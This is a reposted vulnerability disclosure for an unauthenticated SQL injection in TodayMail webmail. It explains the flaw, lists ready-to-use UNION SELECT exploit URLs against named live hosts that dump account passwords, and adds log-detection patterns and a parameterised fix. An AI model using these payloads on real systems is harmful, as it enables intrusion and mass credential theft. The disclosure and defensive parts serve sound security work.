IT博客汇

    TodayMail: an unauthenticated SQL injection can easily dump a large number of enterprise mailbox accounts

    Posted by 没穿底裤 on 2015-10-09 12:31:02

    Vulnerability author: xfkxfk

    Details:

    TodayMail (时代企业邮, the enterprise mail product of now.cn) is described here:

    http://www.now.cn/email/overview.net

    Search keyword: 时代企业邮

    There are plenty of deployments, so no screenshots of them here.

    File: searchAddr.inc.php

    <?
    header('Content-Type:text/xml;charset=UTF-8');
    include_once "../config/dbremote.inc.php";           // database connection only
    include_once "../../core/emailcore.class.inc.php";   // no login-check file is included anywhere

    // Both parameters come straight from the request, with no authentication
    $value=trim($_REQUEST['value']);
    $tm_id=trim($_REQUEST['ftm_id']);
    $EmailCore = new EmailCore($tm_id);
    $addrList=$EmailCore->searchAddrAllByKeyword($value);   // $value is concatenated into SQL below

    // Whatever the queries returned is written back as XML, one <nameN>/<emailN> pair per row
    $str="<?xml version=\"1.0\" encoding=\"UTF-8\"?><properties><property>";
    $str.="<num>".count($addrList)."</num>";
    for($i=0;$i<count($addrList);$i++){
            $str.="<name".$i.">".$addrList[$i]['name']."</name".$i.">";
            $str.="<email".$i.">".$addrList[$i]['email']."</email".$i.">";
    }
    $str.="</property></properties>";
    echo $str;
    ?>

     

    First:

    As you can see, no login-verification file is included, so the script can be reached without logging in.

    Then $value=trim($_REQUEST['value']);

    and then $addrList=$EmailCore->searchAddrAllByKeyword($value);

    Following searchAddrAllByKeyword into emailcore.class.inc.php:

    function searchAddrAllByKeyword($value){
                    //global $db_remote;
                    $addrArray=array();

                    // $value is dropped into the LIKE patterns unescaped: a value of the form
                    // 123%') union select ... # closes the quoted pattern and the parenthesis
                    $sql="select name,email from address  where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";
                    // on failure the full SQL plus mysql_error() is sent to the (anonymous) client
                    $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());
                    while($array=mysql_fetch_assoc($rs)){
                            $addrArray[]=$array;
                    }

                    // same pattern against the todaymail table (the one holding tm_passwd)
                    $sql="select tm_name as name,tm_domain as email from todaymail  where tm_domain='".$this->EmailInfo['tm_domain']."' and (tm_name like '%$value%' or tm_domain like '%$value%') and tm_status in (1,3) and tm_level <> '1' order by tm_name asc";
    //              echo $sql;
                    $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());
                    while($array=mysql_fetch_assoc($rs)){
                            $array['email']=$array['name']."@".$array['email'];
                            $addrArray[]=$array;
                    }

                    // and once more against mailcard
                    $sql="select name,email from mailcard  where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";
                    $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());
                    while($array=mysql_fetch_assoc($rs)){
                            $addrArray[]=$array;
                    }
                    return $addrArray;
            }

     

    It is plain that $value goes straight into the SELECT statements without any filtering or escaping, which is a SQL injection. In every statement it sits inside the '%$value%' pattern of a LIKE within a parenthesised group, so a value of the form 123%') union select ..., ... from todaymail limit 0,1000# closes the quoted pattern and the parenthesis, appends a two-column UNION SELECT (matching the name,email columns of the original query), and the trailing # comments out the remainder of the statement; the injected rows then come back to the caller in the <nameN>/<emailN> elements. Note also that a failing query dies with $sql and mysql_error() echoed into the response, which hands the attacker the exact statement shape needed to tune the payload.

    So data can be pulled straight out with no login at all.

    Unfortunately I did not get server privileges, but from the domain names you can see there are a large number of enterprises here.

    Taking the official site as an example:

    http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,%27@@@%27,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361

    From the tm_domain field you can see there are 4000 domains

    [screenshot of the query output]

    After de-duplication there are still 3000-odd domains, which means 3000-odd enterprises.

    Proof of vulnerability:

    Taking the official site as an example:

    http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361

    This reads the username, domain and password of 1000 users

    [screenshot of the query output]

    A few more examples picked at random:

    http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 
    http://mail.wfq.gov.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
    http://streamline.com.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
    http://mail.inkbank.com.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
    http://mail.zhangjiang.net/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
    http://mail.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
    http://mx601.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
    http://mx605.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
    http://mx606.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
    http://mx621.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
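    For the defender's side, here is an added example (not part of the report, and not TodayMail code) of detection logic that flags the exploitation pattern in the URLs above in a combined-format web server access log. The log lines are constructed for this example; the client addresses, timestamps and sizes in them are placeholders.

```php
<?php
// Added example: flag exploitation attempts against searchAddr.inc.php in an
// Apache/nginx combined-format access log. Sample lines are constructed below.

// Pull the "value" parameter out of a request line such as
//   GET /webmail/main/searchAddr.inc.php?value=...&ftm_id=... HTTP/1.1
// Returns null when the request is not for searchAddr.inc.php.
function decodeSearchAddrValue($requestLine)
{
    if (!preg_match('#^[A-Z]+\s+(\S+)\s+HTTP/#', $requestLine, $m)) {
        return null;
    }
    $url = parse_url($m[1]);
    if (!isset($url['path']) || stripos($url['path'], 'searchAddr.inc.php') === false) {
        return null;
    }
    $params = array();
    parse_str(isset($url['query']) ? $url['query'] : '', $params);   // URL-decodes for us
    return isset($params['value']) ? $params['value'] : '';
}

// The reported payload closes the LIKE literal with %'), appends a UNION SELECT
// and comments out the rest with '#'. Match the shape rather than the exact
// string so the concat()/0x23 variants of the same payload are caught as well.
function isSearchAddrInjection($value)
{
    $patterns = array(
        '/union\s+(all\s+)?select/i',   // UNION-based extraction
        '/\'\s*\)/',                     // closing the quoted LIKE argument
        '/(#|--\s|\/\*)/',               // SQL comment terminators
    );
    foreach ($patterns as $re) {
        if (preg_match($re, $value)) {
            return true;
        }
    }
    return false;
}

// Return the log lines that carry an injection attempt against searchAddr.inc.php.
function findInjectionAttempts(array $lines)
{
    $hits = array();
    foreach ($lines as $line) {
        if (!preg_match('/"([^"]+)"/', $line, $m)) {   // first quoted field = request line
            continue;
        }
        $value = decodeSearchAddrValue($m[1]);
        if ($value !== null && isSearchAddrInjection($value)) {
            $hits[] = $line;
        }
    }
    return $hits;
}

// Constructed sample lines (combined log format); addresses and sizes are placeholders.
$lines = array(
    '203.0.113.5 - - [09/Oct/2015:12:31:02 +0800] "GET /webmail/main/searchAddr.inc.php?value=zhang&ftm_id=103361 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [09/Oct/2015:12:32:10 +0800] "GET /webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 HTTP/1.1" 200 48213 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [09/Oct/2015:12:33:00 +0800] "GET /webmail/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
);

foreach (findInjectionAttempts($lines) as $hit) {
    echo "ALERT searchAddr injection attempt: " . $hit . "\n";
}
```

    Only the second constructed line is reported: its decoded value contains both "union select" and the trailing "#", while an ordinary address-book search for "zhang" matches none of the patterns. An unusually large response size on searchAddr.inc.php (the 48213 bytes here) is a useful secondary signal, since a legitimate address-book search returns a handful of rows.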

     

    There are many databases behind this as well, so mail contents and the like would also leak.

    The user base is very large, so this should count as high-risk: the mail systems of a great many enterprises would essentially be compromised.

    Fix:

    Include the login-verification file so the script cannot be called anonymously, and stop concatenating $value into the SQL: use prepared statements with bound parameters (or at the very least mysql_real_escape_string plus escaping of the LIKE wildcards), and do not echo $sql and mysql_error() back to the client on failure.
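    As an added example (not the report's or TodayMail's code), here is how searchAddr.inc.php could be rewritten to address both findings above, the missing login check and the string-built SQL in searchAddrAllByKeyword. Because the page shows neither TodayMail's login-check file nor its $this->mysql->query() wrapper, the following are assumptions: the webmail session stores the caller's mailbox id and domain in $_SESSION['tm_id'] and $_SESSION['tm_domain'], a plain mysqli connection replaces the wrapper, and the connection details are placeholders.

```php
<?php
// Added example, not TodayMail's code: a hardened rewrite of searchAddr.inc.php.
// Assumptions: the session holds the caller's mailbox id/domain in
// $_SESSION['tm_id'] / $_SESSION['tm_domain'] and a mysqli connection replaces
// the original $this->mysql->query() wrapper. Connection details are placeholders.
header('Content-Type: text/xml; charset=UTF-8');
session_start();

// 1. Refuse anonymous callers (the original includes no login check at all).
if (empty($_SESSION['tm_id']) || empty($_SESSION['tm_domain'])) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}
// 2. Take the mailbox identity from the session, never from ?ftm_id=... in the request.
$tm_id     = (string) $_SESSION['tm_id'];
$tm_domain = (string) $_SESSION['tm_domain'];
$value     = isset($_REQUEST['value']) ? trim($_REQUEST['value']) : '';

$db = new mysqli('db-host', 'db-user', 'db-pass', 'todaymail');   // placeholders
if ($db->connect_error) {
    header('HTTP/1.1 500 Internal Server Error');
    exit;   // never die($sql.mysql_error()) into the response
}
$db->set_charset('utf8');

/**
 * Parameterised replacement for EmailCore::searchAddrAllByKeyword().
 * $tm_id/$tm_domain come from the session; only $value is user-controlled, and it
 * is bound as data, so quotes, parentheses and '#' inside it cannot alter the SQL.
 */
function searchAddrAllByKeyword(mysqli $db, $tm_id, $tm_domain, $value)
{
    // Escape LIKE metacharacters so a literal % or _ in the keyword matches itself
    // instead of acting as a wildcard (MySQL's default LIKE escape character is '\').
    $pattern = '%' . addcslashes($value, '%_\\') . '%';

    // Each entry: SQL with placeholders, followed by the three values to bind.
    $queries = array(
        array("SELECT name, email FROM address WHERE ftm_id = ? AND (name LIKE ? OR email LIKE ?)",
              $tm_id, $pattern, $pattern),
        array("SELECT tm_name AS name, CONCAT(tm_name, '@', tm_domain) AS email FROM todaymail "
              . "WHERE tm_domain = ? AND (tm_name LIKE ? OR tm_domain LIKE ?) "
              . "AND tm_status IN (1,3) AND tm_level <> '1' ORDER BY tm_name ASC",
              $tm_domain, $pattern, $pattern),
        array("SELECT name, email FROM mailcard WHERE ftm_id = ? AND (name LIKE ? OR email LIKE ?)",
              $tm_id, $pattern, $pattern),
    );

    $out = array();
    foreach ($queries as $q) {
        list($sql, $p1, $p2, $p3) = $q;
        $stmt = $db->prepare($sql);
        if ($stmt === false) {
            error_log('searchAddr: prepare failed: ' . $db->error);   // server-side log only
            continue;
        }
        $stmt->bind_param('sss', $p1, $p2, $p3);
        $stmt->execute();
        $stmt->bind_result($name, $email);
        while ($stmt->fetch()) {
            $out[] = array('name' => $name, 'email' => $email);
        }
        $stmt->close();
    }
    return $out;
}

// 3. Same XML shape as the original, but every value is escaped so a stored name
//    containing '<' or '&' cannot break or inject into the document.
$addrList = searchAddrAllByKeyword($db, $tm_id, $tm_domain, $value);
$xml  = '<?xml version="1.0" encoding="UTF-8"?><properties><property>';
$xml .= '<num>' . count($addrList) . '</num>';
foreach ($addrList as $i => $row) {
    $xml .= "<name$i>"  . htmlspecialchars($row['name'],  ENT_QUOTES, 'UTF-8') . "</name$i>";
    $xml .= "<email$i>" . htmlspecialchars($row['email'], ENT_QUOTES, 'UTF-8') . "</email$i>";
}
$xml .= '</property></properties>';
echo $xml;
```

    With the keyword bound as data, the reported payload is simply searched for as a literal string (after addcslashes its % signs are escaped too), the tm_passwd column is never selected, and the todaymail query is still restricted to the caller's own domain. Taking the mailbox id from the session instead of ftm_id also stops a logged-in user from pointing the search at another customer's address book, which the original design allowed even with a login check in place.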
